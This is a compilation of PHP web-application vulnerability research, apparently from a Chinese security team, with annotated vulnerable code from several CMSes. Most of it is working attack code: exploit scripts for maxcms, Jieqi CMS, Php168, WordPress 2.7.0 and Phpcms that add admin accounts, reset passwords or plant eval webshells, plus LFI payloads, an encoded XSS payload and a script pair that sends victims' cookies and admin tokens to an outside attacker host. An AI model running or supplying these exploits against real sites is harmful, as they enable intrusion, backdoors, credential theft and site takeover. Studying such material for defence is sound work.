    set rsObj=nothing
End Sub

Function rCookie(cookieName)
    rCookie = request.cookies(cookieName)
End Function

<?php
print_r('
+---------------------------------------------------------------------------+
maxcms2.0 creat new admin exploit
by Flyh4t
team:wolvez security team
site:bbs.wolvez.org
dork:salemax#qq.com
+---------------------------------------------------------------------------+
');

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/ 
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$name = rand(1,10000);
$cmd = 'm_username=flyh4t'.$name.'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0';

$resp = send($cmd);
if (!eregi('alert',$resp)) {echo"[~]bad luck,exploit failed";exit;}

print_r('
+---------------------------------------------------------------------------+
[+]cool,exploit seccuss
[+]you have add a new adminuser flyh4t'.$name.'/wolvez
+---------------------------------------------------------------------------+
');


function send($cmd)
{
    global $host, $path;
    $message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: flyh4t\r\n";
    $message .= "X-Forwarded-For:1.1.1.1\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Cookie: m_username=flyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checkflyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=7728a57dcd5ae1e69cf0aee02ba66de6\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    echo $message;

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
    $resp .= fread($fp, 1024);
    echo $resp;
    return $resp;
}
?>

 
\inc\ajax.asp

dim action : action = getForm("action", "get")
response.Charset="gbk"

Select  case action
    case "newslist" : viewNewsList
    case "newscontent" : viewNewsContent
    case "digg","tread" : scoreVideo(action)
    case "reporterr" : reportErr
    case "hit" : updateHit
    case else : main
End Select
terminateAllObjects

……

Sub scoreVideo(operType)
    dim sql,id,digg,returnValue : id=getForm("id","get") 
    ‘通过get方式获取id的值
    if rCookie("maxcms2_score"&id)="ok" then die "havescore"
    if isNul(id) then die "err"
    'on error resume next
    digg=conn.db("select m_digg from {pre}data where m_id="&id,"execute")(0)
    ‘ 参数id，没有过滤就带入sql语句进行查询
    if err then digg=0 : err.clear()
    if not isNum(id) then echoSaveStr "safe" else id=clng(id)
    ‘ 查询到digg，注意返回的内容
……

正确的:
http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97
 
    不正确的：
http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=99

<?php
print_r('
+---------------------------------------------------------------------------+
Jieqi cms <= 1.5 remote code execution exploit
by Flyh4t
mail: flyh4t@hotmail.com
team: http://www.wolvez.org
dork: "技术支持：杰奇网络"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to jieqi cms
Example:
php '.$argv[0].' localhost /
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$url = 'http://'.$host.$path.'mirrorfile.php?filename=cache/flyh4t.php&action=writetofile&content=';
$shell = 'http://'.$host.$path.'cache/flyh4t.php';
$cmd = urlencode("<?php @eval(\$_POST[wolvez]);?>test");
$str = file_get_contents($url.$cmd);
if ( file_get_contents($shell) == 'test')
exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
exit("Exploit Failed!\n");
?>

common.inc.php

if($_SERVER['HTTP_CLIENT_IP']){
     $onlineip=$_SERVER['HTTP_CLIENT_IP'];
}elseif($_SERVER['HTTP_X_FORWARDED_FOR']){
     $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
     $onlineip=$_SERVER['REMOTE_ADDR'];
}
$onlineip = preg_replace("/^([\d\.]+).*/", "\\1", filtrate($onlineip));
//这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip

function.inc.php

function filtrate($msg){
    $msg = str_replace('&','&',$msg);
    $msg = str_replace(' ',' ',$msg);
    $msg = str_replace('"','"',$msg);
    $msg = str_replace("'",''',$msg);
    $msg = str_replace("<","&lt;",$msg);
    $msg = str_replace(">","&gt;",$msg);
    $msg = str_replace("\t","   &nbsp;  &nbsp;",$msg);
    $msg = str_replace("\r","",$msg);
    $msg = str_replace("   "," &nbsp; ",$msg);
    return $msg;
}

common.inc.php

    if($usr_oltime>30||!$usr_oltime){
        $usr_oltime>600 && $usr_oltime=600;
        include(PHP168_PATH."php168/level.php");
        if( isset($memberlevel[$lfjdb[groupid]]) ){
            $SQL=",groupid=8";
            $lfjdb[money]=get_money($lfjuid);
            foreach( $memberlevel AS $key=>$value){
                if($lfjdb[money]>=$value){
                    $SQL=",groupid=$key";
                }
            }
        }else{
            $SQL="";
        }
        $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'");
//因为这个地方是拼接字符串的形式,所以可以使用\来转义',然后利用$usr_oltime来注射:)

UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[\]',oltime=oltime+'[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid'

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

$resp = send();
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie)
    if (strpos(send(), 'puret_t') !== false)
        exit("Expoilt Success!\nYou Are Admin Now!\n");
    else 
        exit("Exploit Failed!\n");
else
    exit("Exploit Failed!\n");
    
function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;
    
    if ($cookie) {
        $cookie[1] .= ';USR='.rands()."\t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t";
        $cmd = '';
    
        $message = "POST ".$path."member/userinfo.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "CLIENT-IP: ryat\\\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";
        
        $message = "POST ".$path."login.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }
    
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    
    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    
    return $resp;
}

?>

@extract($_GET);
@extract($_POST);
@extract($_SERVER); 

……

if (!$g4_path || preg_match("/:\/\//", $g4_path))
    die("<meta http-equiv='content-type' content='text/html; charset=$g4[charset]'><script language='JavaScript'> alert('肋给等 规过栏肺 函荐啊 沥狼登菌嚼聪促.'); </script>"); 
   
//if (!$g4_path) $g4_path = ".";

$g4['path'] = $g4_path; //只限制了$g4_path不能有字符 ://

unset($g4_path);

include_once("$g4[path]/lib/constant.php");  //本地文件包含漏洞
include_once("$g4[path]/config.php");  
include_once("$g4[path]/lib/common.lib.php"); 

http://test.com/GnuBoard/common.php?g4_path=../../../../../../../etc/passwd%00

$insLockfile = dirname(__FILE__).'/install_lock.txt';

……

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
     foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}

//可以覆盖$insLockfile为任意值

require_once(DEDEINC.'/common.func.php');

if(file_exists($insLockfile))
{
    exit(" 程序已运行安装，如果你确定要重新安装，请先从FTP中删除 install/install_lock.txt！");
}

wp-admin/post.php

    if ( current_user_can('edit_post', $post_ID) ) {
        if ( $last = wp_check_post_lock( $post->ID ) ) {
            $last_user = get_userdata( $last );
            $last_user_name = $last_user ? $last_user->display_name : __('Somebody');
            $message = sprintf( __( 'Warning: %s is currently editing this post' ), wp_specialchars( $last_user_name ) );
            $message = str_replace( "'", "\'", "<div class='error'><p>$message</p></div>" );
            //提交\'经过此处代码处理后变为\\' :)
            add_action('admin_notices', create_function( '', "echo '$message';" ) );
            //利用上面的方法闭合echo后面的单引号,就可以执行命令了[ex:\';phpinfo();\'];另外这个地方也可以利用create_function函数自身的一个bug[1]来执行命令[ex:\';}phpinfo();//]
        } else {
            wp_set_post_lock( $post->ID );
            wp_enqueue_script('autosave');
        }
    }

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Wordpress 2.7.0 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
site: http://www.80vul.com
dork: "powered by WordPress"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 6) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass post
host:      target server (ip/hostname)
path:      path to wordpress
user:      admin login username
pass:      admin login password
post:      the available post id
Example:
php '.$argv[0].' localhost /wp/ admin 123456 1
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
$post = $argv[5];

$shellcode = '\\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\'';
//$shellcode = '\\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));//';
$shell = 'http://'.$host.$path.'wp-content/plugins/wolvez.php';
/**
 * wolvez.php has this code:
 * <?eval($_POST[c])?>
 */
$url = $path.'wp-login.php';
$cmd = 'log='.urlencode($user).'&pwd='.urlencode($pass);
$resp = send();
preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $admin_cookie);

if (!$admin_cookie)
    exit("Exploit Failed!\n");
    
$url = $path.'wp-admin/user-new.php#add-new-user';
$cmd = '';
$resp = send($admin_cookie[1]);
preg_match('/name="_wpnonce"\svalue="([a-z0-9]{10})"/', $resp, $_wpnonce);

if (!$_wpnonce)
    exit("Exploit Failed!\n");

$cmd = '_wpnonce='.$_wpnonce[1].'&action=adduser&user_login=ryat&email=ryat%40ryat.com&pass1=123456&pass2=123456&role=editor&display_name='.$shellcode;
$resp = send($admin_cookie[1]);

if (strpos($resp, 'users.php?usersearch=ryat&update=add#user') === false)
    exit("Exploit Failed!\n");

$url = $path.'wp-login.php';
$cmd = 'log=ryat&pwd=123456';
$resp = send();
preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $editor_cookie);

if (!$editor_cookie)
    exit("Exploit Failed!\n");

$url = $path.'wp-admin/post.php?action=edit&post='.$post;
$cmd = '';
send($editor_cookie[1]);
send($admin_cookie[1]);

if (strpos(file_get_contents($shell), 'puret_t') !== false)
    exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
    exit("Exploit Failed!\n");

function send($cookie = '')
{
    global $host, $path, $url, $cmd;

    $data = "POST $url  HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Referer: http://$host$path\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "Cookie: $cookie\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>

$_DSESSION = $_DCACHE = array(); //初始化了$_DCACHE等变量
...
if(!$register_globals || !$magic_quotes_gpc) {
    @extract(daddslashes($HTTP_POST_VARS), EXTR_SKIP);
    @extract(daddslashes($HTTP_GET_VARS), EXTR_SKIP);
    if(!$register_globals) {
        foreach($HTTP_POST_FILES as $key => $val) {
            $$key = $val['tmp_name'];
            //这个地方可以覆盖任意变量,比如通过构造$_FILES[_DCACHE]来覆盖$_DCACHE;不过这个tmp_name不能控制[虽然不能控制,但重要的是$_DCACHE被覆盖成了字符串:)]
            ${$key.'_name'} = $val['name'];
            ${$key.'_size'} = $val['size'];
            ${$key.'_type'} = $val['type'];
        }
    }
}
...
@extract($_DCACHE['settings']);
//利用上面的方法覆盖$_DCACHE后,这个地方将导致大量的变量没有初始化,这个思路和[1]SODB-2008-13类似:)

foreach($_REQUEST AS $_k => $_v) { 
    if(eregi("^(globals|cfg_)",$_k)) exit('Request var not allow!');
}
...
require_once(DEDEINC.'/config_hand.php');   //这里$cfg_online_type有初始化
...
require_once(DEDEINC.'/inc_request_vars.php');

foreach(Array('_GET','_POST','_COOKIE') as $_request) 
{
     foreach($$_request as $_k => $_v){
          if($_k{0} != '_') ${$_k} = RunMagicQuotes($_v); //可惜这个地方没法覆盖$_FILES
     }
}

if(is_array($_FILES))
{
  $cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";
  $keyarr = array('name','type','tmp_name','size');
  foreach($_FILES as $_key=>$_value)
  {
      foreach($keyarr as $k) {
          if(!isset($_FILES[$_key][$k])) exit('Request Error!');
      }
      $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\","\\",$_FILES[$_key]['tmp_name']);
      //这个地方也可利用下[虽然不能控制tmp_name],比如覆盖上面的$cfg_not_allowall?
      ${$_key.'_name'} = $_FILES[$_key]['name'];
      ${$_key.'_type'} = $_FILES[$_key]['type'] = eregi_replace('[^0-9a-z\./]','',$_FILES[$_key]['type']);
      //这个地方通过构造$_FILES[cfg_online]就可以覆盖$cfg_online_type了,而且我们可以控制这个值:)
      ${$_key.'_size'} = $_FILES[$_key]['size'] = ereg_replace('[^0-9]','',$_FILES[$_key]['size']);
      if(!empty(${$_key.'_name'}) && (eregi("\.(".$cfg_not_allowall.")$",${$_key.'_name'}) || !ereg("\.",${$_key.'_name'})) )
      {
           if(!defined('DEDEADMIN')) exit('Upload filetype not allow !');
      }
      if(empty(${$_key.'_size'})) ${$_key.'_size'} = @filesize($$_key);
  }

}

if(empty($cfg_online_type)) $cfg_online_type = 'none';
require_once(dirname(__FILE__).'/config_pay_'.$cfg_online_type.'.php');
//用上面的方法覆盖$cfg_online_type，就可以触发本地包含漏洞了:)

...
$tid = isset($tid) && is_numeric($tid) ? $tid : 0;
$db->query("SELECT * FROM threads LIMIT $tid");
...

tid=0x1

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x01' at line 1

$tid = isset($tid) && is_numeric($tid) ? intval($tid) : 0;

tid=-1 //十进制的负数

$mod = $digg_mod;
$digg_setting = cache_read('digg_setting.php');
@extract($digg_setting);
//包含了digg模块的配置文件，并执行了extract
unset($digg_setting);
if ($mod && $id)
//这里的$mod，$id是可以利用的
{
    $table_end = $channelid == 0?'':'_' . $channelid;
    $table_name = $CONFIG['tablepre'] . $mod . $table_end;
    $mod_id = $mod . 'id';
    ......
    {
        $sql = "SELECT * FROM $table_name WHERE $mod_id=$id";
        //这里可以select出需要的任何数据，但是下面并没有比较好的输出数据的地方
    }
    $res = $db->get_one($sql);
    @extract($res);
    //注意这里，这里对select出数据的执行了extract,如果可以控制查询的数据，就可以覆盖任意变量了:)
    ......
    if ($credit_on == 1 && $con && $con != 5 && $con != 0)
    {
        $sql = "SELECT `credit` FROM " . TABLE_MEMBER . " WHERE `username`='$editor'";
        $res_member = $db->get_one($sql);
        if ($res_member)
        {
            if ($con == 3)
            {
                $credit = $res_member['credit'] - $credit_num;
            }
            if ($con == 1 || $con == 2)
            {
                $credit = $res_member['credit'] + $credit_num;
            }
            $db->query("UPDATE " . TABLE_MEMBER . " SET `credit`='$credit' WHERE `username`='$editor'");
            /*
            * 这里就是最终要利用的地方了
            * $credit_on是在digg_setting.php里定义的，但可以利用前面的extract覆盖掉
            * $editor,$credit也利用前面的extract的来覆盖，因为这样是从数据库中查询出的数据，是不受GPC影响的:)
            */
        }
    }

SELECT * FROM [tablepre][table_name],(SELECT 1 AS credit_on,[1',password='[password]' WHERE username='[admin]'#] AS credit,[' UNION SELECT 1#] AS editor) AS [table_name] LIMIT 1# WHERE [mod_id]=[id]

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Phpcms 2007 SP6 reset admin password exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by Phpcms 2007"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 4) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user
host:      target server (ip/hostname)
path:      path to phpcms
user:      admin login name
Example:
php '.$argv[0].' localhost /phpcms/ admin
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];

$url = 'http://'.$host.$path.'member/member.php?username='.$user;

send();

if (strpos(file_get_contents($url), 'puret_t') !== false)
    exit("Expoilt Success!\nAdmin New Password:\t123456\n");
else
    exit("Exploit Failed!\n");

function send()
{
    global $host, $path, $user;

    $cmd = 'digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x'.bin2hex('1\',password=\'e10adc3949ba59abbe56e057f20f883e\',email=\'puret_t\',showemail=1 WHERE username=\''.$user.'\'#').'/**/AS/**/credit,0x'.bin2hex('\' UNION SELECT 1#').'/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6';

    $message = "POST ".$path."digg/digg_add.php  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "CLIENT-IP: ".time()."\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>

...
for (i = 0; i < format_len; i++) {
    switch (format[i]) {
        /* day */
        case 'd': length = slprintf(buffer, 32, "%02d", (int) t->d); break;
        case 'D': length = slprintf(buffer, 32, "%s", php_date_short_day_name(t->y, t->m, t->d)); break;
        case 'j': length = slprintf(buffer, 32, "%d", (int) t->d); break;
        ...

        case '\\': if (i < format_len) i++; /* break intentionally missing */

        default: buffer[0] = format[i]; buffer[1] = '\0'; length = 1; break;
    }
    smart_str_appendl(&string, buffer, length);
}
...

        $searcharray = array(
                "/\[font=([^\[\(&]+?)\]/is",
                ...
        );
        $replacearray = array(
                "<span style=\"font-family:\\1\">",
                ...
        );
        $message = preg_replace($searcharray,$replacearray,$message);

[font=\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\77\69\6e\64\6f\77\2e\78\21\3d\27\70\27\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\27\70\27\3b\7d\29]

[font=expression(if(window.x!='p'){alert('xss');window.x='p';})]

[font=\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\77\69\6e\64\6f\77\2e\78\21\3d\27\70\27\29\7b\65\76\61\6c\28\53\74\72\69\6e\67\2e\66\72\6f\6d\43\68\61\72\43\6f\64\65\28\31\31\35\2c\36\31\2c\31\30\30\2c\31\31\31\2c\39\39\2c\31\31\37\2c\31\30\39\2c\31\30\31\2c\31\31\30\2c\31\31\36\2c\34\36\2c\39\39\2c\31\31\34\2c\31\30\31\2c\39\37\2c\31\31\36\2c\31\30\31\2c\36\39\2c\31\30\38\2c\31\30\31\2c\31\30\39\2c\31\30\31\2c\31\31\30\2c\31\31\36\2c\34\30\2c\33\39\2c\31\31\35\2c\39\39\2c\31\31\34\2c\31\30\35\2c\31\31\32\2c\31\31\36\2c\33\39\2c\34\31\2c\35\39\2c\31\31\35\2c\34\36\2c\31\31\35\2c\31\31\34\2c\39\39\2c\36\31\2c\33\39\2c\31\30\34\2c\31\31\36\2c\31\31\36\2c\31\31\32\2c\35\38\2c\34\37\2c\34\37\2c\31\31\39\2c\31\31\39\2c\31\31\39\2c\34\36\2c\31\31\39\2c\31\31\31\2c\31\30\38\2c\31\31\38\2c\31\30\31\2c\31\32\32\2c\34\36\2c\31\31\31\2c\31\31\34\2c\31\30\33\2c\34\37\2c\39\39\2c\31\31\35\2c\31\31\34\2c\31\30\32\2c\34\36\2c\31\30\36\2c\31\31\35\2c\33\39\2c\35\39\2c\31\30\30\2c\31\31\31\2c\39\39\2c\31\31\37\2c\31\30\39\2c\31\30\31\2c\31\31\30\2c\31\31\36\2c\34\36\2c\39\38\2c\31\31\31\2c\31\30\30\2c\31\32\31\2c\34\36\2c\39\37\2c\31\31\32\2c\31\31\32\2c\31\30\31\2c\31\31\30\2c\31\30\30\2c\36\37\2c\31\30\34\2c\31\30\35\2c\31\30\38\2c\31\30\30\2c\34\30\2c\31\31\35\2c\34\31\2c\35\39\29\29\3b\77\69\6e\64\6f\77\2e\78\3d\27\70\27\3b\7d\29]

[font=expression(if(window.x!='p'){eval(String.fromCharCode(115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,119,111,108,118,101,122,46,111,114,103,47,99,115,114,102,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59));window.x='p';})]

s=document.createElement('script');s.src='http://www.wolvez.org/csrf.js';document.body.appendChild(s);

function puret_t() {
        var xmlHttp;
        // IE...
        if (window.ActiveXObject) {
                var XmlHttpVersions = new Array('MSXML2.XMLHTTP.6.0',
                                                'MSXML2.XMLHTTP.5.0',
                                                'MSXML2.XMLHTTP.4.0',
                                                'MSXML2.XMLHTTP.3.0',
                                                'MSXML2.XMLHTTP',
                                                'Microsoft.XMLHTTP');
                for (var i = 0; i < XmlHttpVersions.length && !xmlHttp; i ++) {
                        try {
                                xmlHttp = new ActiveXObject(XmlHttpVersions);
                        } catch (e) {
                                try {
                                        xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
                                } catch (e) {
                                        xmlHttp = false;
                                }
                        }
                }
        // Non-IE...
        } else {
                xmlHttp = false;
        }
        
        if (!xmlHttp) {
                return false;
        }
        
        xmlHttp.open("GET", "http://www.puretot.com/phpwind/admin.php?adminjob=setuser", false);
        xmlHttp.send();
        var str = xmlHttp.responseText;
        var reg = /\<form action=\"\/phpwind\/admin.php\?adminjob=setuser&verify=(\w+&)\"/i;
        var arr = reg.exec(str);

        var url = "http://www.wolvez.org/puret_t.php?verify="+arr[1]+"cookie="+document.cookie;
        var image = new Image();
        image.src = url;
}
puret_t();

<?php

error_reporting(7);

if (get_magic_quotes_gpc()) {
        function stripslashes_array($array)
        {
                return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
        }
        $_GET = stripslashes_array($_GET);
}

$verify = isset($_GET['verify']) ? (preg_match('#^[a-z0-9]{8}$#iD', $_GET['verify']) ? $_GET['verify'] : NULL) : NULL;
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : NULL;

$host = 'www.puretot.com';
$path = '/phpwind/';
$agent = $_SERVER['HTTP_USER_AGENT'];
$post = 'action=edutgroup&gid%5B2%5D=3';

if ($verify && $cookie)
        send($verify, $cookie);

function send($verify, $cookie)
{
        global $host, $path, $agent, $post;

        $message = "POST ".$path."admin.php?adminjob=setuser&verify=$verify  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Referer: http://".$host.$path."admin.php?adminjob=setuser&verify=$verify\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: $agent\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($post)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: $cookie\r\n\r\n";
        $message .= $post;
        
        $fp = fsockopen($host, 80);
        fputs($fp, $message);

}

?>

$post = 'action=edutgroup&gid%5B2%5D=3';

<?php

$a = '';     // 要转换的字符串
$l = strlen($a);
$b = '';
for ($i = 0; $i < $l; $i ++) {
        $b .= '\\'.bin2hex($a{$i});
}
echo $b;

?>

<?php

$a = '';     // 要转换的字符串
$l = strlen($a);
$b = '';
for ($i = 0; $i < $l; $i ++) {
        if ($i == 0)
                $b .= hexdec(bin2hex($a{$i}));
        else 
                $b .= ','.hexdec(bin2hex($a{$i}));
}
echo $b;

?>

include('inc/'.$_GET['a'].'/global.php');

...
if (!empty($_COOKIE["userlanguage"]) && file_exists("lang/" . basename($_COOKIE["userlanguage"]) . "/global.php")) $language = $_COOKIE["userlanguage"];
...
include_once("lang/$language/index.php");
...
$template = preg_replace("/\{lang\s+(.+?)\}/ies", "languagevar('\\1')", $template);
...
fwrite($fp, $template);
...
function languagevar($var) {
    if(isset($GLOBALS['lang'][$var])) {
        return $GLOBALS['lang'][$var];
    } else {
        return "!$var!";
    }
}
...

../../[file][null char]/eng

<?php
$a='';
for($i=0;$i<=4071;$i++) {
    $a .= '/';
}
$a = 'test.txt'.$a;                   //完整的路径为/var/www/test/test.txt
require_once($a.'.php');
?>

$magic_quotes_gpc = get_magic_quotes_gpc();
extract(daddslashes($_COOKIE));
extract(daddslashes($_POST));
extract(daddslashes($_GET));
if(!$magic_quotes_gpc) {
    $_FILES = daddslashes($_FILES);
}
......
function daddslashes($string, $force = 0) {
    if(!$GLOBALS['magic_quotes_gpc'] || $force) {
        if(is_array($string)) {
            foreach($string as $key => $val) {
                $string[$key] = daddslashes($val, $force);
            }
        } else {
            $string = addslashes($string);
        }
    }
    return $string;
}

function login_logs($username,$password) {
     global $timestamp,$onlineip;
     $logdb[]="$username\t$password\t$timestamp\t$onlineip";
     @include(PHP168_PATH."cache/adminlogin_logs.php");
     $writefile="<?php \r\n";
     $jj=0;
     foreach($logdb AS $key=>$value) {
         $jj++;
         $writefile.="\$logdb[]=\"$value\";\r\n";
 
         if($jj>200) {
             break;
         }
     }
     write_file(PHP168_PATH."cache/adminlogin_logs.php",$writefile);
 }